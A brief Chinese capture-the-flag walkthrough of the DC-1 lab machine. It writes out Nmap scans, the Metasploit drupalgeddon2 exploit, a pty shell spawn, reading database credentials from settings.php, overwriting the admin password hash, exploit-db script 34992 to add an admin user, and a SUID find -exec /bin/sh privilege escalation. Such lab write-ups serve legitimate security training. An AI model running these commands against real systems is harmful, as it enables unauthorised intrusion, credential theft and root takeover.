使用Nmap命令对目标网络进行扫描,以识别活动主机和开放的端口。
命令行示例:Nmap -sP 192.168.1.0/24 和 Nmap -A -v -p- 192.168.172.128
Nmap -A -v -p-
识别目标网站使用的CMS(内容管理系统)为Drupal 7,并查找已知的漏洞。
使用Metasploit框架查找并利用Drupal的漏洞。
命令行示例:msfconsole,use exploit/unix/webapp/drupal_drupalgeddon2,set rhosts 192.168.172.128,run
进入以后输入python -c "import pty;pty.spawn('/bin/bash')"对于后续操做更加方便
ls 查看一下文件发现flag1
Cat 查看一下flag1
找找那个是配置文件查看一下sites文件夹在进入default查看settings.php文件发现flag2
下面还有数据库的用户名和密码直接进入数据库show databases;
进入drupaldb :use drupaldb;
Users比较可疑查看一下 两个用户
判断密码可能是哈希加密
退出数据库找一下
find . -name *hash* 真找到了
这个文件是直接运行在后面加字符串返回哈希值
登录MySQL数据库
update users set pass='$S$DeXC.4Coyx980S7.vM35tKbd1AZ3l08zqUFVqjQFkYdnzLnJqAqM' where name='admin';
更改admin密码直接改了
改完后,我要说第二个方法了
使用kali自带的searchsploit drupal
找到对应版本的漏洞利用文件
python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.172.128 -u admin4 -p admin4
直接添加一共用户这个用户有root权限
然后拿去登录网页
在后台找到flag3
在/etc/passwd下面有一个flag4
尝试进入root目录发现进不去才提权的
find / -perm -4000 -type f 2>/dev/null查找一下有root权限且可以使用的命令
发现find命令那就简单了
就是find随便一个文件然后执行用-exec执行以下/bin/sh就ok了
搞定DC1 简简单单